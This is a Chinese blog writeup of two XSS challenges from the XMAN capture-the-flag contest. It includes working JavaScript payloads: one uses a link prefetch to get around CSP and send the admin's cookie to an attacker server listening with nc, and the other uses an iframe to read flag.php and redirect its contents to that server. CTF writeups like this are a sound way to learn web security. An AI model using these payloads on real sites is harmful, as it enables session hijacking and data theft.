【XSS】XMAN個人排位賽xss賽題writeup

0x01 前言

講道理,之前每次遇到xss的題就很發(fā)憷,因為不會呀,這次XMAN個人排位賽的兩道xss賽題讓我對于xss有了更深入的認識,這里整理一下writeup

0x02 xss1

首先,進入頁面

是一個留言框,下面有一個md5后四位的校驗碼
然后寫了一個python腳本用來生成校驗碼

import hashlib
for i in range(1000000):
    if hashlib.md5(str(i)).hexdigest()[:4]=='cdc1':
       print i 
       break

留言板嘛,很容易想到是xss,先用

<script>alert(1)</script>

試了一下,果然能彈窗,xss無疑了,并且發(fā)現(xiàn)這里的我寫的語句只是單純的被輸出到了頁面里,這樣應該是一個非常簡單的xss利用了。

然后fuzz了一下,發(fā)現(xiàn)這里沒有過濾任何參數(shù),所以很適合我這種新手呀。。。。
通過抓包看到的resoponse包的header,我們能夠發(fā)現(xiàn)他的csp策略,定義了所以來源都要跟與本頁面同源,因此可以用link預加載標簽進行繞過。關于CSP的學習和繞過可以參考這篇文章http://www.itdecent.cn/p/f1de775bc43e

然后寫利用的js代碼

<script>
var i=document.createElement("link");
i.setAttribute("rel","prefetch");
i.setAttribute("href","https://ip:port/?"+document.cookie);
document.head.appendChild(i);
</script>

在我們的服務器上,要

nc -l port

在href的屬性里填寫自己的服務器的ip和端口,這段代碼的意思就是當對方admin查看我們的留言之后,就會自動的訪問我們的服務器,服務器通過監(jiān)聽端口,來得到admin的cookie值。這里在admin的cookie中得到了flag

0x03xss2

打開頁面,還是熟悉的頁面,還是熟悉的套路。不過這次更難一些。
這里還是腳本跑驗證碼,然后發(fā)送留言,burp抓包發(fā)現(xiàn)這次沒有這個CSP策略,fuzz之后發(fā)現(xiàn)他把單引號替換成了_下劃線,所以可以利用雙引號進行繞過。用上個xss的腳本打過去發(fā)現(xiàn)這次沒有返回cookie。。想到了今年國賽有道xss的題也是沒有cookie返回的題,又想到題目描述中說flag在flag.php里面,然后發(fā)現(xiàn)只有管理員才能訪問flag.php,那么就很明顯了,讓admin用iframe打開一個flag.php的子窗口,然后子窗口中鏈接到我的服務器,這樣就能將消息帶給我了,我就能收到flag了。

<iframe id="test" src="http://202.112.51.217:43424/flag.php(這里是flag所在)" onload="test()"></iframe>
<script>
function test(){
  parent.window["location"].href="http://ip:port/?"+escape(document.getElementById("test").contentWindow.document.documentElement.outerHTML )
}
</script>

然后得到flag

最后編輯于
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內(nèi)容

  • 第一次AK web,大佬們很厲害。。 easy_sign_in 直接看證書,看到一個flag in,后面有一個ip...
    zhazhami閱讀 3,395評論 1 8
  • 漏洞挖掘與利用 測試環(huán)境的搭建 引言 為什么要搭建本地測試環(huán)境?我想下面的東西能夠回答你的疑惑。 第二百八十五條 ...
    作業(yè)沒寫完閱讀 3,536評論 0 4
  • 前段時間在學習Web安全方面的知識,對這方面有了進一步的了解,決定寫文章記錄下來,只是對Web安全方面知識的一些總...
    邱振源的博客閱讀 1,325評論 0 1
  • 1、漏洞概述 XSS 是指攻擊者在網(wǎng)頁中嵌入客戶端腳本,通常是 JavaScript 編寫的惡意代碼,當用戶使 用...
    linkally閱讀 1,784評論 2 10
  • 捉迷藏 題目url:http://218.76.35.75:20111/index.php 進去之后查看源碼: 發(fā)...
    Pr0ph3t閱讀 1,756評論 0 2

友情鏈接更多精彩內(nèi)容